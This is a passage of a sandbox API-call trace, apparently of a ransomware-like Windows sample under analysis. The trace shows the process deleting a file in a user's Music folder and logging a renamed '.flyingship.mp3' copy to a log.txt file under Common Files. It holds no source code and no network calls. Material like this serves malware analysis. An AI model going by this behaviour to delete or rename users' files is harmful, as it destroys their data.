lpUsedDefaultChar=0x0) returned 10 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bdac8 [0187.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bdac8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0187.838] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.838] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.838] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.838] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0187.838] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.838] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.839] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0187.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd930, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.839] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.839] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.840] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.840] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0187.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0187.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.840] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", lpFilePart=0x0) returned 0x3f [0187.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0x152fe060, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 0x90ae18 [0187.840] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\rrcvj.mp3")) returned 1 [0187.842] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0x152fe060, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 0 [0187.842] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.845] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.846] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.846] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.846] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0187.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.847] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.847] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.847] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.847] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.847] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.848] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.848] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.848] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.848] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.849] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.849] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x28f1, lpOverlapped=0x0) returned 1 [0187.849] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.849] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x28f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.849] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0187.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d) returned 0x923a78 [0187.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3\r\n", cchWideChar=77, lpMultiByteStr=0x923a78, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 77 [0187.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0187.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0187.849] WriteFile (in: hFile=0x160, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x4c, lpOverlapped=0x0) returned 1 [0187.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0187.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.850] CloseHandle (hObject=0x160) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.851] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.851] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.853] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.853] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.853] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0187.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.853] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1990 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.854] PeekMessageW (in: 